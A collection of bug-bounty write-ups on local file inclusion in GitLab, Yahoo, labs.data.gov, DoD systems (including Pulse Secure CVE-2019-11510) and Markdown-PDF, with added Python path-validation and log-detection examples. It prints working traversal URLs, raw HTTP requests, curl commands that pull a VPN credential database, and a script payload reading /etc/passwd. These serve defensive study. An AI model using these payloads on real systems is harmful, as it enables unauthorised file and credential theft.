Local File Inclusion Writeups

Gitlab

A researcher discovered an LFI in GitLab that triggers when an issue is transferred to another project. The researcher created an issue in project A with the following payload in its description:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

Transferring that issue from project A to project B then copies the server's /etc/passwd file into project B's uploads.

Researcher PoC:

The flaw is in the UploadsRewriter controller, which validates neither the file name nor the path; a traversal sequence in the upload reference therefore lets arbitrary files be copied when an issue is moved to another project.

  # Vulnerable rewrite loop: every upload reference matched in the issue text is
  # looked up in the source project and copied to the target project as-is.
  @text.gsub(@pattern) do |markdown|
    file = find_file(@source_project, $~[:secret], $~[:file])
    break markdown unless file.try(:exists?)

    klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader
    moved = klass.copy_to(file, target_parent)
...
  # The captured :file value reaches the uploader without any check for path
  # separators or "..", so it can point outside the upload directory.
  def find_file(project, secret, file)
    uploader = FileUploader.new(project, secret: secret)
    uploader.retrieve_from_store!(file)
    uploader
  end

Yahoo - URL sub parameter

Requesting a download for any file on https://brandtoolkit.yahoo.com/ returns a download popup whose URL is marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=. The dlurl parameter contains the URL-encoded string 8lcO%3A%2F%2F0w.QbN.0.*Q%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3DaR9UU_hI-q5_UjP.W7U. When this is URL-decoded, three sub-parameters become visible: z8A, Ujd and hj.

8lcO://0w.QbN.0.*Q:nbbn0/PSID?z8A=AxT_DIfP7_UO9Y6I_hD67IdcI&Ujd=lpxBXLmiKWMPRwUsLpu8cZ&hj=aR9UU_hI-q5_UjP.W7U

The parameter vulnerable to LFI is hj. Its value is encrypted in ECB mode with a block size of 32 characters. The researcher wrote a PoC to encrypt and decrypt strings and, for convenience, provided the following payload: /../../../../../../../../etc/passwd, which encrypts to /../../../../../../../../79d/zGcIwd.

Placing the encrypted payload in the full URL retrieves the /etc/passwd file. Full URL with payload:

https://marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=8lcO%3A%2F%2F0w.QbN.0.%2AQ%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F79d%2FzGcIwd

TTS (labs.data.gov)

The researcher discovered a limited LFI on the endpoint https://labs.data.gov/dashboard/Docs/index: appending a URL-encoded dot-dot-slash followed by README retrieves the Readme.md file.

Full URL with payload: https://labs.data.gov/dashboard/Docs/index/..%2fREADME

Screenshot: viewing the Readme.md file through the LFI in the URL.

The LFI is limited to markdown files. In the code below, which controls this functionality, the index function of the Docs class takes the page parameter from the URL (the value the researcher modified with the payload). The document path is then built by the line $docs_path = $docs_path . $page . '.md', which concatenates the docs_path variable with the user-supplied page value and appends .md. That fixed .md suffix is what prevents any file other than markdown from being retrieved.

    public function index($page = 'main')
    {
        $data = array();

        // Base location of the documentation: configured value or the GitHub default.
        $docs_path = ($this->config->item('docs_path')) ? $this->config->item('docs_path') : 'https://raw.githubusercontent.com/GSA/project-open-data-dashboard/master/documentation/';
        // The user-controlled $page is concatenated unchecked; only the fixed
        // '.md' suffix limits which files can be reached.
        $docs_path = $docs_path . $page . '.md';
        $docs = @file_get_contents($docs_path);
        // ...
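Both the GitLab rewriter and the dashboard's index function above hand a user-controlled path fragment straight to the filesystem. The Python below is an added example, not code from GitLab or the project-open-data-dashboard, of the containment check that would have rejected both payloads: each component is validated on its own and the resolved path is then compared against its root. The 32-hex-character secret format, the root directories and the helper names are assumptions.

```python
import os
import re

SECRET_RE = re.compile(r"[0-9a-f]{32}")        # assumed secret format (32 hex chars)
NAME_RE = re.compile(r"[A-Za-z0-9._-]+")       # one path component, no separators


def safe_join(root, *parts):
    """Return root/part1/... or None if any part could escape root."""
    for part in parts:
        # Reject separators, empty names and '.'/'..' before touching the filesystem.
        if not NAME_RE.fullmatch(part) or part in (".", ".."):
            return None
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, *parts))
    # Second line of defence (also catches symlinks): the resolved path must stay below root.
    if candidate != root_abs and not candidate.startswith(root_abs + os.sep):
        return None
    return candidate


def find_upload(uploads_root, secret, file):
    """GitLab-style lookup: a secret directory plus a bare file name."""
    if not SECRET_RE.fullmatch(secret):
        return None
    return safe_join(uploads_root, secret, file)


def docs_file(docs_root, page):
    """Dashboard-style lookup: a page name with the fixed '.md' suffix."""
    return safe_join(docs_root, page + ".md")


# Constructed inputs taken from the two write-ups above.
GITLAB_PAYLOAD = ("11111111111111111111111111111111",
                  "../../../../../../../../../../../../../../etc/passwd")
DASHBOARD_PAYLOAD = "../README"          # URL-decoded form of ..%2fREADME
```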

DoD LFI

LFI in the URL via directory (path) traversal: the dot-dot-slash sequences are double URL-encoded (..%252f) to retrieve files from the target system. Retrieving c:/windows/System32/drivers/etc/hosts as a PoC:

GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts HTTP/1.1
Host: ██████████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

The URL with payload can also just be pasted into a browser:

https://███████/gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts

Attempting to retrieve Users/Administrator/NTUser.dat to determine whether the application runs under an administrator account:

GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fUsers/Administrator/NTUser.dat HTTP/1.1
Host: ████
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

DoD Pulse Secure LFI (CVE-2019-11510)

The researcher found a Pulse Secure SSL VPN server missing the patch for CVE-2019-11510. This vulnerability lets an attacker retrieve backend files such as /etc/passwd. Another file targeted by attackers is the database /runtime/mtmp/lmdb/dataa/data.mdb, which contains usernames and passwords; those credentials could be used to authenticate to the SSL VPN and conduct post-breach activity.

# Retrieve the /etc/passwd file ($URL is the VPN base URL; --path-as-is keeps the ../ segments)
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"

# Retrieve the /runtime/mtmp/lmdb/dataa/data.mdb file
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"

DoD

The researcher discovered an LFI on a DoD application's registration page. The HTTP form body parameter registerUserInfoCommand.nextPageName is vulnerable: submitting the payload ..%2f..%2f..%2fWEB-INF%2fweb.xml returns the application's web.xml file to the user.

Full HTTP body parameters with payload in registerUserInfoCommand.nextPageName:

registerUserInfoCommand.organization=Chantest+Corporation&registerUserInfoCommand.organizationId=49800&registerUserInfoCommand.currPageName=SearchUserOrgInfo.jsp&registerUserInfoCommand.nextPageName=..%2f..%2f..%2fWEB-INF%2fweb.xml&registerUserInfoCommand.prevPageName=jsp%2FRegistration%2FRegisterAccountInfo.jsp&registerUserInfoCommand.submitButton=Choose+This+Organization+and+Continue+%3E

Researcher retrieved the following files:

/WEB-INF/spring/mvc-config.xml
/WEB-INF/spring/rest-config.xml
/WEB-INF/classes/compliance/reports/adminRpt.pre.sql
/WEB-INF/classes/compliance/reports/adminRpt.full.sql
/WEB-INF/classes/compliance/reports/complianceStatusRptSql.sql
/WEB-INF/classes/████.properties

With the last file containing database credentials:

Test.DB.URL=jdbc:oracle:thin:@localhost:1521:XE
Test.DB.username=██████████
Test.DB.password=██████
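The DoD GET requests, the Pulse Secure curl paths, the labs.data.gov URL and the DoD form field above all use the same primitive in different encodings: raw ../ sent with --path-as-is, single-encoded ..%2f, and double-encoded ..%252f. Below is an added detection example, not taken from any of the write-ups, that percent-decodes a request target repeatedly before looking for a ".." segment and runs it over constructed log lines; the common-log-format layout and the client addresses are assumptions.

```python
import re
from urllib.parse import unquote

TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")
# Assumed common-log-format line; only the request target is extracted.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing (bounded against loops)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True if the fully decoded, slash-normalised value contains a '..' segment."""
    decoded = fully_decode(value).replace("\\", "/")
    return TRAVERSAL_RE.search(decoded) is not None


def flag_lines(log_lines):
    """Return the request targets in log_lines that carry a traversal attempt."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group(1)):
            hits.append(match.group(1))
    return hits


# Constructed sample log lines modelled on the write-ups (client IPs are made up).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2020:10:00:00 +0000] "GET /gwtmain//..%252f..%252f..%252fwindows/System32/drivers/etc/hosts HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2020:10:00:01 +0000] "GET /dashboard/Docs/index/..%2fREADME HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2020:10:00:02 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1201',
    '203.0.113.5 - - [01/Jan/2020:10:00:03 +0000] "GET /dashboard/Docs/index/main HTTP/1.1" 200 4096',
]
```

The same is_traversal check applies to decoded form-field values such as registerUserInfoCommand.nextPageName, which the access log does not record.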

Markdown-PDF: 3rd Party Node Module

The researcher discovered an LFI in the third-party Node.js module Markdown-PDF. The module converts markdown to PDF, but it first converts the markdown into an HTML5 boilerplate page (index.html) and then has PhantomJS render that HTML and save it as a PDF. Because the HTML is rendered server-side, a malicious markdown file can carry script that reads local files. In the example below, the uploaded markdown file (test.md) uses document.write to insert the contents of /etc/passwd into the rendered page, which is returned to the end user after PDF conversion:

# this is h1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
